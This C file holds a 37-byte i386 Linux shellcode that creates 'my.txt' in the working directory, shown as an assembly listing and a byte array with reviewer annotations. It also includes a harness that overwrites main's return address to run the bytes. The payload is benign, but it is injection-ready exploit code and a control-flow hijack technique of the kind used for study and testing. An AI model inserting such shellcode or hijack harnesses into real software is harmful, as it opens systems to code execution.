/*
#Title: Create 'my.txt' in present working directory of vulnerable software
#Length: 37 bytes
#Date: 3 April 2015
#Author: Mohammad Reza Ramezani (mr.ramezani.edu [at] gmail com - g+)
#Tested On: kali-linux-1.0.6-i386

Section .text
    global _start

_start:
    push byte 8
    pop eax
    jmp short GoToCall

shellcode:
    pop ebx
    xor edx, edx
    mov [ebx + 6], dl
    push word 0544o
    pop ecx
    int 0x80

    push byte 1
    pop eax
    xor ebx, ebx
    int 0x80

GoToCall:
    call shellcode
    db 'my.txtX'

This shellcode can be generalized by using an absolute path instead of 'my.txt'.
*/
/*
 * Assembled form of the listing in the header comment: 37 bytes of i386
 * Linux code, followed by the NUL the string literal appends
 * (sizeof shellcode == 38).  One literal per instruction so the bytes can
 * be read against the assembly.
 *
 * Reviewer notes:
 *  - The jmp/call/pop sequence recovers the address of the trailing
 *    'my.txtX' string at run time, so the code carries no absolute address.
 *  - The final 'X' is a placeholder; the store at [ebx + 6] overwrites it
 *    with zero, which keeps NUL bytes out of the encoded payload.  That
 *    store writes into this array, so the bytes must sit in memory that is
 *    both writable and executable for the code to run at all.
 *  - "push word" pushes 16 bits while "pop ecx" pops 32, so only the low
 *    half of ecx is set by this sequence.
 *  - Syscall numbers are the i386 ones: 8 is creat, 1 is exit.
 */
char shellcode[] =
	"\x6a\x08"                      /* push byte 8                          */
	"\x58"                          /* pop  eax            ; eax = 8        */
	"\xeb\x14"                      /* jmp  short GoToCall                  */
	"\x5b"                          /* shellcode: pop ebx  ; -> 'my.txtX'   */
	"\x31\xd2"                      /* xor  edx, edx                        */
	"\x88\x53\x06"                  /* mov  [ebx + 6], dl  ; 'X' -> NUL     */
	"\x66\x68\x64\x01"              /* push word 0544o                      */
	"\x59"                          /* pop  ecx                             */
	"\xcd\x80"                      /* int  0x80                            */
	"\x6a\x01"                      /* push byte 1                          */
	"\x58"                          /* pop  eax            ; eax = 1        */
	"\x31\xdb"                      /* xor  ebx, ebx                        */
	"\xcd\x80"                      /* int  0x80                            */
	"\xe8\xe7\xff\xff\xff"          /* GoToCall: call shellcode             */
	"\x6d\x79\x2e\x74\x78\x74\x58"; /* db 'my.txtX'                         */
/*
 * Test harness for the byte array above.  It does not call the array; it
 * overwrites a stack slot near its own local so that returning from main
 * transfers control to `shellcode`.
 *
 * NOTE(review): the whole function relies on undefined behaviour and on one
 * particular frame layout.  The header comment lists kali-linux-1.0.6-i386
 * as the tested platform; whether the slot written here is the saved return
 * address on any other compiler, optimisation level or ABI cannot be told
 * from this file.  A build with a stack protector, or a system that maps
 * the data segment non-executable, would be expected to stop this harness
 * rather than run the payload; confirm on the target toolchain.
 */
int main()
{
	int *ret;

	/*
	 * Point `ret` two int-sized slots above its own address.  Presumably
	 * this is where the author's compiler kept main's return address;
	 * verify against the generated frame before relying on it.
	 */
	ret = (int *)&ret + 2;

	/*
	 * Store the array's address in that slot.  The cast to int keeps only
	 * as many bits as an int holds, so this fits 32-bit pointers only.
	 */
	(*ret) = (int)shellcode;

	/* No return statement: control leaves through the slot written above. */
}